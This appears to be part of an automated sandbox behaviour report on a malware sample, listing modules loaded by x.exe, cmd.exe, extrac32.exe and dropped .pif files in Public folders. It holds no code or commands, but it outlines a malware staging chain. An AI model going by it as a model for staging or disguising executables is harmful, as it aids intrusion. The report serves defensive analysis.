Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppwmi.dll	Jump to behavior
